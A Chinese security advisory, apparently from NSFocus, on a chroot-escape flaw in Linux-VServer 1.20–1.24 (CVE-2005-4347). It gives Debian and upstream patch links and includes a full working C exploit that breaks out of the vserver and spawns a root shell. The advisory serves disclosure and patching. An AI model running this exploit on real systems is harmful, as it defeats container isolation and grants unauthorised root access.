信息来源:绿盟科技
发布日期:2004-02-07
更新日期:2006-07-17
受影响系统:
VServer Linux-VServer 1.24
VServer Linux-VServer 1.23
VServer Linux-VServer 1.22
VServer Linux-VServer 1.21
VServer Linux-VServer 1.20
不受影响系统:
VServer Linux-VServer 1.25
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 9596
CVE(CAN) ID: CVE-2005-4347
Linux-VServer是一个允许用户在一个普通的Linux服务器上建立虚拟专用的服务器的软件。
Linux-VServer存在典型的"chroot-again"问题,本地攻击者可以利用这个漏洞以ROOT用户权限在系统上执行任意指令。
主要问题是VServer应用程序针对"chroot-again"类型的攻击没有很好的进行安全保护,攻击者可以利用这个漏洞脱离限制环境,访问限制目录之外的任意文件。
<*来源:Markus Müller (
unknown@priv.de)
链接:
http://marc.theaimsgroup.com/?l= ... 19109429591&w=2
http://www.debian.org/security/2005/dsa-1011
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* vserver deadbeef de modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */
/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */
#include <sys/types.h>
#include <sys/stat.h>
main()
{
int i;
if (chdir("/") != 0) {
perror("cd /"); exit(1);
}
if (mkdir("baz", 0777) != 0) {
perror("mkdir baz");
}
if (chroot("baz") != 0) {
perror("chroot baz"); exit(1);
}
for (i=0; i<50; i++) {
if (chdir("..") != 0) {
perror("cd .."); /* exit(1); */
}
if (chmod("..", S_IXOTH) != 0) {
perror("chmod"); /* exit(1); */
}
}
if (chroot(".") != 0) {
perror("chroot ."); exit(1);
}
printf("Exploit seems to work. =)\n");
execl("/bin/sh", "sh", "-i", (char *)0);
perror("exec sh");
exit(0);
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Debian
------
Debian已经为此发布了一个安全公告(DSA-1011-1)以及相应补丁:
DSA-1011-1:New kernel-patch-vserver packages fix root exploit
链接:
http://www.debian.org/security/2005/dsa-1011
补丁下载:
Source archives:
http://security.debian.org/pool/ ... vserver_1.9.5.5.dsc
Size/MD5 checksum: 637 415731be72a9cd966e2fdb5d4f408c4a
http://security.debian.org/pool/ ... rver_1.9.5.5.tar.gz
Size/MD5 checksum: 950447 fe6b34612095d2fbdbaab5aefbd83264
http://security.debian.org/pool/ ... .30.204-5sarge3.dsc
Size/MD5 checksum: 752 e32069a5ca2ef2bc87794cd6c2160821
http://security.debian.org/pool/ ... 204-5sarge3.diff.gz
Size/MD5 checksum: 115947 d0bb2cd998a73905189ee24b5f46dd0d
http://security.debian.org/pool/ ... .30.204.orig.tar.gz
Size/MD5 checksum: 677831 b315f375b1cef48da1b644dec18f22bd
Architecture independent components:
http://security.debian.org/pool/ ... ver_1.9.5.5_all.deb
Size/MD5 checksum: 436934 b50048ea819d150d660ed96e3988613b
Alpha architecture:
http://security.debian.org/pool/ ... 4-5sarge3_alpha.deb
Size/MD5 checksum: 600660 e52fe0ff93e4c9ca7d58fe8386ebab5a
AMD64 architecture:
http://security.debian.org/pool/ ... 4-5sarge3_amd64.deb
Size/MD5 checksum: 429530 c4155982844c085b7d9bc59d7eaa02c4
Intel IA-32 architecture:
http://security.debian.org/pool/ ... 04-5sarge3_i386.deb
Size/MD5 checksum: 398794 56831faa6fa6d76c601fee78251f50eb
Intel IA-64 architecture:
http://security.debian.org/pool/ ... 04-5sarge3_ia64.deb
Size/MD5 checksum: 640332 ab2b2e4283ca5b62c9d9cf5776b6dadb
Big endian MIPS architecture:
http://security.debian.org/pool/ ... 04-5sarge3_mips.deb
Size/MD5 checksum: 612918 e4a60532f25ce776880261de79278e85
Little endian MIPS architecture:
http://security.debian.org/pool/ ... -5sarge3_mipsel.deb
Size/MD5 checksum: 614152 f3aee29aad2682878f8ed22064f3fafa
PowerPC architecture:
http://security.debian.org/pool/ ... 5sarge3_powerpc.deb
Size/MD5 checksum: 425444 9a7542249c2b70661abab2afd5270462
IBM S/390 architecture:
http://security.debian.org/pool/ ... 04-5sarge3_s390.deb
Size/MD5 checksum: 440880 376560971a0d2db4bfd51beb67d42bff
Sun Sparc architecture:
http://security.debian.org/pool/ ... 4-5sarge3_sparc.deb
Size/MD5 checksum: 395640 51e24ac4754b1aa41277378ee9271a1f
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
VServer
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
VServer Patch patch-2.4.24-vs1.25.diff.gz
http://www.13thfloor.at/vserver/ ... 4.24-vs1.25.diff.gz
VServer Patch split-2.4.24-vs1.25.tar.gz
http://www.13thfloor.at/vserver/ ... .4.24-vs1.25.tar.gz
VServer Patch util-vserver-0.28.tar.bz2
http://www.13thfloor.at/vserver/ ... server-0.28.tar.bz2
VServer Patch util-vserver-0.28-1mdk.i586.rpm
http://www.13thfloor.at/vserver/ ... -0.28-1mdk.i586.rpm
VServer Patch util-vserver-linuxconf-0.28-1mdk.i586.rpm
http://www.13thfloor.at/vserver/ ... -0.28-1mdk.i586.rpm
